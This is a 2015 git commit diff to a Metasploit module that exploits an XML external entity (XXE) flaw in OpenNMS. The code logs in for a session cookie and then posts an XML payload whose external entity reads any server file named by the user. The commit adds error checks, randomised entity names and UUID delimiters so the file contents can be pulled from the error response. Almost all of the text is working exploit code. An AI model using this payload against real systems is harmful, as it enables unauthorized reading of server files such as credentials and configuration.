Added error checks, randomness, and uuid delimeter

2015-03-17 10:20:22 -04:00 · 2015-03-17 10:20:22 -04:00 · 0490af8ba8
parent f3fc4003d0
commit 0490af8ba8
1 changed files with 24 additions and 8 deletions
--- a/modules/exploits/linux/http/opennms_xxe.rb
+++ b/modules/exploits/linux/http/opennms_xxe.rb
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
  def run

    print_status("Logging in to grab a valid session cookie")
+
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),
@ -60,6 +61,12 @@ class Metasploit3 < Msf::Auxiliary
      },
    })

+    if res.nil?
+      fail_with("No response from POST request")
+    elsif res.code != 302
+      fail_with("Non-302 response from POST request")
+    end
+
    unless res.headers["Location"].include? "index.jsp"
      fail_with(Failure::Unknown, 'Authentication failed')
    end
@ -68,7 +75,16 @@ class Metasploit3 < Msf::Auxiliary

    print_status("Got cookie, going for the goods")

-    xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file://'+datastore["FILEPATH"]+'" >]><foo>&xxe;</foo>'
+    rand_doctype= Rex::Text.rand_text_alpha(rand(1..10))
+    rand_entity1 = Rex::Text.rand_text_alpha(rand(1..10))
+    rand_entity2 = Rex::Text.rand_text_alpha(rand(1..10))
+    delimiter = SecureRandom.uuid
+
+    xxe = %Q^<?xml version="1.0" encoding="ISO-8859-1"?>
+    <!DOCTYPE #{rand_doctype} [
+    <!ELEMENT #{rand_entity1} ANY >
+    <!ENTITY #{rand_entity2} SYSTEM "file://#{datastore["FILEPATH"]}" >
+    ]><#{rand_entity1}>#{delimiter}&#{rand_entity2};#{delimiter}</#{rand_entity1}>^

    res = send_request_raw({
      'method' => 'POST',
@ -77,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary
      'cookie' => cookie
    })

-    # extract filepath data from response and remove preceding errors
+    # extract filepath data from response

-    if res.body =~ /<title.*\/?>(.+)<\/title\/?>/m
-      title = $1
+    if res and res.code == 400 and res.message =~ /#{delimiter}(.+)#{delimiter}/
+      result = $1
+      print_good("#{result}")
+    else
+      fail_with(Failure::Unknown, 'Error fetching file, try another')
    end

-    result = title.match(/"(.*)/m)
-
-    print_good("#{result}")
-
  end
 end
+